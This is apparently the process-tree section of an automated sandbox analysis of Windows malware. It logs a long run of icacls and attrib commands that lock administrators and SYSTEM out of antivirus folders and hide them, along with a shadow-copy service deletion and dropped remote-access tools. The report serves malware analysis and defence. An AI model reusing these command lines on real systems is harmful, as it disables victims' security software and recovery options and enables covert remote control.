            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:6084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
          PID:5200
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
            PID:784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
          PID:4140
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
          PID:5580
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
            PID:5608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          PID:5404
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:4616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
          PID:4932
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3980
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
          PID:5052
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
            PID:5644
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:4168
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:5144
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
          PID:5556
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3892
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
          PID:5420
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5956
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
          PID:5940
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
            PID:6048
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:5780
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5684
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:5992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5824
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2652
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5528
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:5852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:5740
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:1780
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
            PID:5500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
          PID:5508
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
            PID:5600
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:1880
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:2544
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:5188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
          PID:5192
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          PID:5280
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
            PID:5648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:5212
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            PID:5252
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5748
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:5028
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:6028
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            PID:1200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5664
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
          PID:6116
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
            PID:3676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
          PID:5860
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
            PID:5844
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5960
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5364
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
          PID:4804
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2256
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
          PID:5128
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5332
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
          PID:5288
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
            PID:3792
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:3492
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          PID:2732
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
            PID:2796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:4560
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5132
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          PID:188
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
            PID:4468
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
          PID:5112
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
            PID:5612
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:5584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
          PID:5720
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 5 /NOBREAK
            Delays execution with timeout.exe
            PID:5776
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 3 /NOBREAK
            Delays execution with timeout.exe
            PID:5924
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM 1.exe /T /F
            Kills process with taskkill
            PID:5384
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM P.exe /T /F
            Kills process with taskkill
            PID:5440
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:5548
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
          PID:5996
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM iediagcmd.exe /T /F
            Kills process with taskkill
            PID:5944
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5388
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6060
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:6100
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
            PID:5460
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\360\Total Security"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5480
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6140
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360TotalSecurity
            Views/modifies file attributes
            PID:5396
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360safe
            Views/modifies file attributes
            PID:5516
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2360
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5344
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\Avira
            Views/modifies file attributes
            PID:2784
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5488
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Package Cache"
            Views/modifies file attributes
            PID:1452
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2836
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\ESET"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5040
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4176
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\ESET
            Views/modifies file attributes
            PID:5260
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:2704
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:1636
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5076
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\AVAST Software"
            Views/modifies file attributes
            PID:5536
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5380
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
            Views/modifies file attributes
            PID:5732
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
            Views/modifies file attributes
            PID:1264
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:816
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5756
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\AdwCleaner"
            Views/modifies file attributes
            PID:1688
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:1368
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5672
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:3956
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "c:\programdata\Malwarebytes"
            Views/modifies file attributes
            PID:1444
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5936
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\MB3Install"
            Views/modifies file attributes
            PID:5820
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5808
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\KVRT_Data"
            Views/modifies file attributes
            PID:2052
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5416
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Norton"
            Views/modifies file attributes
            PID:5220
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2964
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Avg"
            Views/modifies file attributes
            PID:5352
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5544
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\grizzly"
            Views/modifies file attributes
            PID:5168
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5540
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Doctor Web"
            Views/modifies file attributes
            PID:5164
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:1056
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Indus"
            Views/modifies file attributes
            PID:1156
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5244
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\WINDOWS\McMwt"
            Drops file in Windows directory
            Views/modifies file attributes
            PID:5564
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5272
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5768
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:3420
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
            PID:5788
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            Delays execution with timeout.exe
            PID:5596
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:1764
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
            PID:6120
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6036
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
            PID:3020
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
            Views/modifies file attributes
            PID:1124
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
            Views/modifies file attributes
            PID:5432
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
            Views/modifies file attributes
            PID:5492
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:3372
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:3280
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:2276
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe /tray
      Executes dropped EXE
      PID:2272
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe
      Executes dropped EXE
      PID:2072
      • C:\ProgramData\Windows\rfusclient.exe
        C:\ProgramData\Windows\rfusclient.exe /tray
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        PID:372
  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    Checks SCSI registry key(s)
    Modifies data under HKEY_USERS
    PID:3508
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
    PID:3764
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Loads dropped DLL
    PID:4664

Network

MITRE ATT&CK Matrix